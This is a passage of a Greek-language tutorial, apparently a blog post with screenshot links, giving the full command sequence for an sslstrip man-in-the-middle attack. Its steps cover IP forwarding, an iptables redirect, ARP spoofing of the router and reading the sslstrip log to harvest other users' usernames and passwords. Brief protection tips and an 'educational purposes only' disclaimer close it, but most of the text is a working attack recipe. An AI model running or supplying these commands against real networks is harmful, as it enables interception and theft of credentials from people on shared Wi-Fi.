4) Τέλος κάνω εγκατάσταση γράφοντας: python setup.py install

http://zyphyto1.host56.com/sslstrip/6.jpg

1) Ανοίγω νέο τρματικό και γράφω την παρακάτω εντολή έτσι ώστε να ορίσω τη θύρα που θα στέλνονται τα δεδομένα: echo ’1′ > /proc/sys/net/ipv4/ip_forward 

http://zyphyto1.host56.com/sslstrip/1.jpg

2) Βρισκω την ΙΡ του router: netstat -nr

http://zyphyto1.host56.com/sslstrip/2.jpg

3) Στη συνέχεια ορίζω τα iptables στη θύρα 8080: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 

http://zyphyto1.host56.com/sslstrip/7.jpg

4) Αρχίζω να κάνω arpspoofing ή αλλιώς δημιουργώ κίνηση στο router δηλητηριάζοντας το έτσι ώστε να κάνω ΜΙΤΜ επίθεση: arpspoof -i wlan0 192.168.0.1 (Αντικαθιστώ το wlan0 με τον τύπο της σύνδεσης και σαν ΙΡ δίνω την ΙΡ της Gateway που μου δώθηκε όταν έβαλα στο τερματικό την εντολή  netstat -nr

http://zyphyto1.host56.com/sslstrip/8.jpg

5) Τέλος ενεργοποιώ το sslstrip: sslstrip -l 8080

http://zyphyto1.host56.com/sslstrip/9.jpg

6) Επομένως αυτό που έχουμε είναι 2 τερματικά όπου στο ένα τρέχει το sslstrip και στο άλλο το arpspoof

http://zyphyto1.host56.com/sslstrip/12-%20sitandwait.jpg

7) Αν επιθυμώ να μου εμφανίζεται στο τερματικό η κίνηση του δικτύου γράφω: tail -f sslstrip.log 

http://zyphyto1.host56.com/sslstrip/16-logfiletail.jpg

http://zyphyto1.host56.com/sslstrip/17-3screens.jpg

8) Όταν οι χρήστες του δικτύου ανοίξουν οποιαδήποτε σελίδα στην οποία δίνουν username/password τότε αυτομάτως εμφανίζονται στην οθόνη μας. Επίσης αν δεν εμφανίζονται κωδικοί στην οθόνη μπορούμε να μεταβούμε στο φάκελο του sslstrip και να βρούμε ένα αρχείο name.log όπου θα εμφανίζεται εκεί η κίνηση του δικτύου.

http://zyphyto1.host56.com/sslstrip/passwords%20recieved.jpg

ΣΗΜΕΙΩΣΗ:
Για τυχόν errors που θα εμφανιστούν πιθανόν στο τερματικό σας μη δώσετε σημασία. Δεν υπάρχει κανένα πρόβλημα είναι φυσιολογικό. Απλά κάθε φορά έχετε το νού σας για αναβαθμίσεις του sslstrip στη σελίδα του έτσι ώστε να έχετε ενημερωμένες εκδόσεις του.

http://zyphyto1.host56.com/sslstrip/14-error.jpg

Επίσης το sslstrip δεν μπορεί να δουλέψει τόσο καλά με browsers όπως ο Mozilla και το Google Chrome και όπως επίσης με site ειδικά με το Gmail.

Τρόποι προστασίας:
  • Θα πρέπει να αποφεύγουμε να μπαίνουμε σε site όπου δίνουμε κωδικούς πρόσβασης σε δίκτυα ασύρματα/ ενσύρματα που δεν είναι ασφαλή όπως τα ασύρματα δίκτυα μιας καφετέριας ενός internet cafe κτλ.
  • Επίσης θα πρέπει όταν είμαστε σε τέτοια δίκτυα και όταν μπούμε στη σελίδα και πάμε να δώσουμε τον κωδικό πρόσβασης πάντα μα πάντα να ελέγχουμε πάνω στο σύνδεσμο να γράφει: https://............ αυτό είναι η πιστοποίηση για την εγκυρότητα του site. Μας λέει δηλαδή οτι δεν είναι πλαστό και οτι δε χρησιμοποιεί κάποιος μια πλαστή σελίδα έτσι ώστε να μας αποσπάσει κωδικούς.
  • Τέλος, είναι πολύ σημαντικό να προσέχουμε οτιδήποτε περίεργο μας εμφανιστεί ή οποιαδήποτε περίεργη συμπεριφορά προκύψει κατα τη διάρκεια φόρτωσης της οποιαδήποτε σελίδας και του δικτύου.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.